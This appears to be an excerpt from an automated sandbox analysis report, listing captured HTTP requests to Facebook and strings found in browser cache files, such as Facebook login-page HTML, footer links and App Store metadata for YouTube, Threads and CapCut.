    Source: global trafficHTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585715430&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=1&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585715431&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=2&o=4126&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__aaid=0&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU6C7UW3q327E2vwXw4BwUx60Vo1upE4W0OE2WxO0FE662y1Qw5Mx61vw4Ugao6C0lW0ny0RE2Jw8Xwn83fw6iw4vwbS1Lw7Jw7zwtU5K&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419924079772026106&__req=3&__rev=1016900551&__s=soewkf%3A5l6w24%3Ahbua9m&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585699&__user=0&dpr=1&jazoest=2982&lsd=AVrwfIkMi5Q HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /ajax/webstorage/process_keys/?state=1 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: chromecache_485.2.drString found in binary or memory: <a href="https://www.facebook.com/?locale=ru_RU" target="blank"> equals www.facebook.com (Facebook)
    Source: chromecache_279.2.drString found in binary or memory: "https://www.facebook.com/AppStore/" equals www.facebook.com (Facebook)
    Source: chromecache_577.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/9cisb7Fe7ih/ equals www.facebook.com (Facebook)
    Source: chromecache_380.2.dr, chromecache_626.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/A4tfXiHOGrs/ equals www.facebook.com (Facebook)
    Source: chromecache_608.2.dr, chromecache_405.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/CCT5pM3qiNk/ equals www.facebook.com (Facebook)
    Source: chromecache_380.2.dr, chromecache_626.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/Ga6vBwdwgUx/ equals www.facebook.com (Facebook)
    Source: chromecache_608.2.dr, chromecache_405.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/MDzNl_j9yvg/ equals www.facebook.com (Facebook)
    Source: chromecache_372.2.dr, chromecache_490.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/OKBVmODmb-W/ equals www.facebook.com (Facebook)
    Source: chromecache_508.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/V9vdYColc4k/ equals www.facebook.com (Facebook)
    Source: chromecache_347.2.dr, chromecache_588.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/WRsJ32R7YJG/ equals www.facebook.com (Facebook)
    Source: chromecache_547.2.dr, chromecache_643.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/YzYYrH_bE_k/ equals www.facebook.com (Facebook)
    Source: chromecache_608.2.dr, chromecache_405.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ equals www.facebook.com (Facebook)
    Source: chromecache_505.2.dr, chromecache_508.2.dr, chromecache_275.2.dr, chromecache_374.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ equals www.facebook.com (Facebook)
    Source: chromecache_321.2.dr, chromecache_373.2.drString found in binary or memory: </span><a href="https://www.facebook.com/" data-gt="&#123;&quot;target&quot;:&quot;home&quot;,&quot;marketing_page_click&quot;:&quot;1&quot;,&quot;conversion&quot;:&quot;1&quot;&#125;">Go to Feed</a><span role="presentation" aria-hidden="true"> equals www.facebook.com (Facebook)
    Source: chromecache_321.2.drString found in binary or memory: <i class="_3jii img sp_PEqIp1jvkJq sx_17d8b9" id="u_0_1_BY"></i></span></a><div class="_yl7 _ylb __tw hidden_elem" id="u_0_2_pZ"><div class="beeperNub"></div><div class="_yl8"><div class=""><form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;lwv=110" method="post" novalidate="1" onsubmit=""><input type="hidden" name="jazoest" value="2999" autocomplete="off" /><input type="hidden" name="lsd" value="AVrwfIkMwY0" autocomplete="off" /><div class="_erp"><div class="_err"><label for="email">Email or phone</label></div><div class="_err"><input type="email" class="inputtext login_form_input_box" name="email" id="email" data-testid="royal_email" /></div><div class="_ers"><label for="pass">Password</label></div><div class="_ers"><input type="password" class="inputtext login_form_input_box" name="pass" id="pass" data-testid="royal_pass" /></div><div class="_er_"><a href="https://www.facebook.com/recover/initiate?lwv=110&amp;ars=royal_blue_bar">Forgotten account?</a></div><button value="1" class="_42ft _4jy0 _es1 _3jd8 login_form_login_button _4jy5 _4jy1 selected _51sy" id="loginbutton" data-testid="royal_login_button" type="submit">Log in</button></div><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_3_Sj" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_yx" /><input type="hidden" name="lgnrnd" value="215537_dD05" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_GB" /><input type="hidden" autocomplete="off" name="login_source" value="login_bluebar" /><input type="hidden" autocomplete="off" name="guid" value="" /><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /></form></div><div class="_yl9">Do you want to join Facebook?</div><a role="button" class="_42ft _4jy0 _yla _4jy3 _4jy2 selected _51sy mrm" href="/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzI3NTg1NzM3LCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D" tabindex="4">Sign Up</a></div></div></div></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_GB">Sign Up</a></span></div></div></div></div></div></div><div id="globalContainer" class="_cqt"><div class="fb_content clearfix " id="content" role="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn&#039;t available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_PEqIp1jvkJq sx_82a77e"></i><div class="mbl pvl _4
    Source: chromecache_373.2.drString found in binary or memory: <i class="_3jii img sp_PEqIp1jvkJq sx_17d8b9" id="u_0_1_JG"></i></span></a><div class="_yl7 _ylb __tw hidden_elem" id="u_0_2_tI"><div class="beeperNub"></div><div class="_yl8"><div class=""><form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;lwv=110" method="post" novalidate="1" onsubmit=""><input type="hidden" name="jazoest" value="21005" autocomplete="off" /><input type="hidden" name="lsd" value="AVrwfIkMZcI" autocomplete="off" /><div class="_erp"><div class="_err"><label for="email">Email or phone</label></div><div class="_err"><input type="email" class="inputtext login_form_input_box" name="email" id="email" data-testid="royal_email" /></div><div class="_ers"><label for="pass">Password</label></div><div class="_ers"><input type="password" class="inputtext login_form_input_box" name="pass" id="pass" data-testid="royal_pass" /></div><div class="_er_"><a href="https://www.facebook.com/recover/initiate?lwv=110&amp;ars=royal_blue_bar">Forgotten account?</a></div><button value="1" class="_42ft _4jy0 _es1 _3jd8 login_form_login_button _4jy5 _4jy1 selected _51sy" id="loginbutton" data-testid="royal_login_button" type="submit">Log in</button></div><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_3_Vh" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_c7" /><input type="hidden" name="lgnrnd" value="215426_bow8" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_GB" /><input type="hidden" autocomplete="off" name="login_source" value="login_bluebar" /><input type="hidden" autocomplete="off" name="guid" value="" /><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /></form></div><div class="_yl9">Do you want to join Facebook?</div><a role="button" class="_42ft _4jy0 _yla _4jy3 _4jy2 selected _51sy mrm" href="/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzI3NTg1NjY2LCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D" tabindex="4">Sign Up</a></div></div></div></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_GB">Sign Up</a></span></div></div></div></div></div></div><div id="globalContainer" class="_cqt"><div class="fb_content clearfix " id="content" role="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn&#039;t available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_PEqIp1jvkJq sx_82a77e"></i><div class="mbl pvl _
    Source: chromecache_279.2.drString found in binary or memory: Get access to YouTube Music Premium as part of your benefits\\n\\nNote: If you subscribe via Apple, payment will be charged to App Store Account at confirmation of purchase. Subscription automatically renews unless auto-renew is turned off at least 24 hours before the end of the current period. Account will be charged for renewal within 24 hours prior to the end of the current period at the rate of the selected plan. Subscriptions and auto-renewal may be managed by going to Account Settings after purchase.\\n\\nYouTube paid service terms: https://www.youtube.com/t/terms_paidservice.\\nPrivacy policy: https://www.google.com/policies/privacy\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"websiteUrl\":\"https://www.youtube.com\",\"versionHistory\":[{\"versionDisplay\":\"19.38.2\",\"releaseNotes\":\"Fixed bugs, improved performance, drank way too much coffee.\",\"releaseDate\":\"2024-09-25\",\"releaseTimestamp\":\"2024-09-25T14:07:13Z\"},{\"versionDisplay\":\"19.37.2\",\"releaseNotes\":\"Fixed bugs, improved performance, took the afternoon off.\",\"releaseDate\":\"2024-09-16\",\"releaseTimestamp\":\"2024-09-16T11:51:19Z\"},{\"versionDisplay\":\"19.36.1\",\"releaseNotes\":\"Bug fixes, stability improvements, repairs to space-time continuum.\",\"releaseDate\":\"2024-09-08\",\"releaseTimestamp\":\"2024-09-08T23:00:37Z\"},{\"versionDisplay\":\"19.35.3\",\"releaseNotes\":\"We fixed the tubes that bring you videos equals www.youtube.com (Youtube)
    Source: chromecache_279.2.drString found in binary or memory: Leap into the fediverse\\nThreads is part of the fediverse, a global, open, social network of independent servers operated by third parties around the world. Servers share information with each other to enable people to connect and discover new things across the fediverse.\\n\\n\\nMeta Terms: https://www.facebook.com/terms.php\\nMeta Privacy Policy: https://privacycenter.instagram.com/policy\\nThreads Supplemental Privacy Policy: https://help.instagram.com/515230437301944\\nThreads Supplemental Terms: https://help.instagram.com/769983657850450\\nInstagram Community Guidelines: https://help.instagram.com/477434105621119\\nConsumer Health Privacy Policy: https://privacycenter.instagram.com/policies/health\\n\\nLearn how we're working to help keep our communities safe across Meta technologies at the Meta Safety Center: https://about.meta.com/actions/safety\\n\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"versionHistory\":[{\"versionDisplay\":\"350.0\",\"releaseNotes\":\"We equals www.facebook.com (Facebook)
    Source: chromecache_321.2.drString found in binary or memory: </a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2Fajax%2Fwebstorage%2Fprocess_keys%2F%3Fstate%3D1&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_SOkuOHNUdYM sx_2458cb"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log in to Facebook">Log in</a></li><li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse in Video">Video</a></li><li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://about.meta.com/technologies/meta-pay" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Discover Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://www.meta.com/smart-glasses/" title="Learn more about Ray-Ban Meta" target="_blank">Ray-Ban Meta</a></li><li><a href="https://www.meta.ai/" title="Meta AI">Meta AI</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3ZSIVdvoDihJfCvvvcUjRyBRDer0uELEcSRiNAPFcC5_GUeeeZW9bzBK2pXUOP7Zmnk0llQRLHrUgIA_IVVwbfyGVn9KCLblCmB2SKOXwxn5GI6aWKmBm4LSMXl48O4sTTrVenYesJckIlOYxJzg" title="Take a look at Instagram" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.threads.net/" title="Check out Threads">Threads</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Centre">Voting Information Centre</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Centre</a></li><li><a href="/groups/discover/" title="Explore our groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placeme
    Source: chromecache_373.2.drString found in binary or memory: </a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2Fshared%2Fuser_preferences%2F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_SOkuOHNUdYM sx_2458cb"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log in to Facebook">Log in</a></li><li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse in Video">Video</a></li><li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://about.meta.com/technologies/meta-pay" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Discover Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://www.meta.com/smart-glasses/" title="Learn more about Ray-Ban Meta" target="_blank">Ray-Ban Meta</a></li><li><a href="https://www.meta.ai/" title="Meta AI">Meta AI</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT0srC_u1kWtzrdYicGZd9sto8Wt2eyQEhT00URZ9Am3H0xaUcMFxgGPO4tQOzakVOn9IFQX9UMHtFH6Lhe6TYCTn0RAcVkPqWYbbREc65IKne0jr-laQu8dKmUBLTlB-_Z0YE0XnnSew0R_6_wltA" title="Take a look at Instagram" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.threads.net/" title="Check out Threads">Threads</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Centre">Voting Information Centre</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Centre</a></li><li><a href="/groups/discover/" title="Explore our groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaig
    Source: chromecache_373.2.drString found in binary or memory: <script type="text/javascript" nonce="PIHjeYla">requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["cr:7736",["FBLynxLogging"],{"__rc":["FBLynxLogging",null]},-1],["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT3Z7SEM0Hz_GnPYi4DovINYZhldj5P81qF60LfzOgsfOSIj4TsCLrcHA3OkSXHApDqgVxy-fhn0DaRV3f9XAdTE9wt2l1iZfvvH8mZv_pkoPQc786ILdda0BNG_bb6qlN7ZpGjzVfrAZ-tK5WoKOA","untrusted_link_default_hash":"AT12o0IHq8WwYxyjCe-T-enRJILm4N5xdYOKoCtja-heYx2__6X3-Q8hPR86Y3QFI-v1S45nl4aVcbLuYFTqz1eDDO--7Ca_v2pJpSzjXVfpN7imYOp5atkuq8uegrk0fLXOfJAcPPiJEKGl3K3bUw","linkshim_host":"l.facebook.com","linkshim_path":"\/l.php","linkshim_enc_param":"h","linkshim_url_param":"u","use_rel_no_opener":true,"use_rel_no_referrer":true,"always_use_https":true,"onion_always_shim":true,"middle_click_requires_event":true,"www_safe_js_mode":"asynclazy","m_safe_js_mode":"MLynx_asynclazy","ghl_param_link_shim":false,"click_ids":[],"is_linkshim_supported":true,"current_domain":"facebook.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"elements":[["__elem_072b8e64_0_0_Tp","u_0_0_Hp",1],["__elem_94c15385_0_0_d4","u_0_1_JG",1],["__elem_a588f507_0_3_DC","u_0_2_tI",1],["__elem_835c633a_0_0_u8","login_form",1],["__elem_efa9dffa_0_0_+l","email",1],["__elem_45d73b5d_0_0_Ug","loginbutton",1],["__elem_f46f4946_0_0_Xg","u_0_3_Vh",1],["__elem_f46f4946_0_1_zw","u_0_4_c7",1],["__elem_a588f507_0_1_Vp","u_0_5_+3",1],["__elem_9f5fac15_0_0_ut","pagelet_bluebar",1],["__elem_a588f507_0_0_XY","globalContainer",1],["__elem_a588f507_0_2_rI","content",1]],"require":[["WebPixelRatioDetector","startDetecting",[],[false]],["ScriptPath","set",[],["X4oh4Controller","a1f3c513",{"imp_id":"0oO7PN6kq7qiTkYGC","ef_page":null,"uri":"https:\/\/www.facebook.com\/shared\/user_preferences\/"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_XY"],[{"__m":"__elem_a588f507_0_0_XY"}]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["AsyncRequestNectarLogging"],["FourOhFourJSLogger","log",[],[]],["IntlUtils"],["FBLynx","setupDelegation",[],[]],["LoginbarPopover","init",["__elem_94c15385_0_0_d4","__elem_072b8e64_0_0_Tp","__elem_a588f507_0_3_DC"],[{"__m":"__elem_94c15385_0_0_d4"},{"__m":"__elem_072b8e64_0_0_Tp"},{"__m":"__elem_a588f507_0_3_DC"}]],["TimezoneAutoset","setInputValue",["__elem_f46f4946_0_0_Xg"],[{"__m":"__elem_f46f4946_0_0_Xg"},1727585666]],["ScreenDimensionsAutoSet","setInputValue",["__elem_f46f4946_0_1_zw"],[{"__m":"__elem_f46f4946_0_1_zw"}]],["LoginFormController","init",
    Source: chromecache_321.2.drString found in binary or memory: <script type="text/javascript" nonce="lPBYSIch">requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["cr:7736",["FBLynxLogging"],{"__rc":["FBLynxLogging",null]},-1],["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT2hctOYbrRVNy2Cls9kGu7rvVROOssJ8cwm9RuhSdIsxiaMZ0ASbm9Exw68t96MIrq5ARj_jvPK21dI_vndP85vMspeyArLvbcr8E2S4No0-1_myMcQ6hoSM1DstaC2BcbabkVVvhXuJtK2bWToWg","untrusted_link_default_hash":"AT1vJGxNs6yH0dg56EQL-xE-cvPv4RKs9F0cPO5RKPOySBf9YHCTDfxgwnYmOLVs1SRZiWJ9tLkuNL6_oCiKMTpv-Y8CTPUx9NWm8F1RyreIoCnQGjeYsBSomrOTgOf_tmmCVozGn3tod573AEOhQA","linkshim_host":"l.facebook.com","linkshim_path":"\/l.php","linkshim_enc_param":"h","linkshim_url_param":"u","use_rel_no_opener":true,"use_rel_no_referrer":true,"always_use_https":true,"onion_always_shim":true,"middle_click_requires_event":true,"www_safe_js_mode":"asynclazy","m_safe_js_mode":"MLynx_asynclazy","ghl_param_link_shim":false,"click_ids":[],"is_linkshim_supported":true,"current_domain":"facebook.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"elements":[["__elem_072b8e64_0_0_l6","u_0_0_bk",1],["__elem_94c15385_0_0_20","u_0_1_BY",1],["__elem_a588f507_0_3_K9","u_0_2_pZ",1],["__elem_835c633a_0_0_Xb","login_form",1],["__elem_efa9dffa_0_0_VU","email",1],["__elem_45d73b5d_0_0_X9","loginbutton",1],["__elem_f46f4946_0_0_0\/","u_0_3_Sj",1],["__elem_f46f4946_0_1_DP","u_0_4_yx",1],["__elem_a588f507_0_1_S2","u_0_5_AY",1],["__elem_9f5fac15_0_0_0m","pagelet_bluebar",1],["__elem_a588f507_0_0_lH","globalContainer",1],["__elem_a588f507_0_2_3t","content",1]],"require":[["WebPixelRatioDetector","startDetecting",[],[false]],["ScriptPath","set",[],["X4oh4Controller","a1f3c513",{"imp_id":"0hAgLoMHLSpJRVRG4","ef_page":null,"uri":"https:\/\/www.facebook.com\/ajax\/webstorage\/process_keys\/?state=1"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_lH"],[{"__m":"__elem_a588f507_0_0_lH"}]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["AsyncRequestNectarLogging"],["FourOhFourJSLogger","log",[],[]],["IntlUtils"],["FBLynx","setupDelegation",[],[]],["LoginbarPopover","init",["__elem_94c15385_0_0_20","__elem_072b8e64_0_0_l6","__elem_a588f507_0_3_K9"],[{"__m":"__elem_94c15385_0_0_20"},{"__m":"__elem_072b8e64_0_0_l6"},{"__m":"__elem_a588f507_0_3_K9"}]],["TimezoneAutoset","setInputValue",["__elem_f46f4946_0_0_0\/"],[{"__m":"__elem_f46f4946_0_0_0\/"},1727585737]],["ScreenDimensionsAutoSet","setInputValue",["__elem_f46f4946_0_1_DP"],[{"__m":"__elem_f46f4946_0_1_DP"}]],["LoginFormCo
    Source: chromecache_279.2.drString found in binary or memory: \\nhttps://www.capcut.net/clause/privacy?region=us\\n\\nContact Us\\nAny questions about CapCut? Please contact us at capcut.support@bytedance.com.\\nFacebook: https://www.facebook.com/capcutapp/\\nInstagram: https://www.instagram.com/capcutapp/\\nYouTube: https://www.youtube.com/c/capcutofficial\\nTikTok: https://www.tiktok.com/@capcut\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"websiteUrl\":\"https://www.capcut.com\",\"versionHistory\":[{\"versionDisplay\":\"4.6.0\",\"releaseNotes\":\"- Added custom tracking for any area to camera tracking.\\n- Added new scenes to auto removal for improved portrait removal.\\n- Short text recommendations are now supported in AI writer for smart generation of narrations, editing, expanding, and summarizing.\\n- Layout presets and custom layouts are now supported in the editor window for improved editing efficiency.\\n- AI image inpaint is now supported with smart erase or content replacement.\",\"releaseDate\":\"2024-09-28\",\"releaseTimestamp\":\"2024-09-28T12:53:54Z\"},{\"versionDisplay\":\"4.1.0\",\"releaseNotes\":\"- Several preinstalled, realistic, AI-generated people with natural backgrounds have been added.\\n- Smart Split in the editor now supports deleting and moving split points.\\n- Clean up edge and Feather edge added to Chroma keying.\\n- Fixed some known issues - improved the editing experience.\\nThank you for choosing CapCut and creating even more beautiful moments with 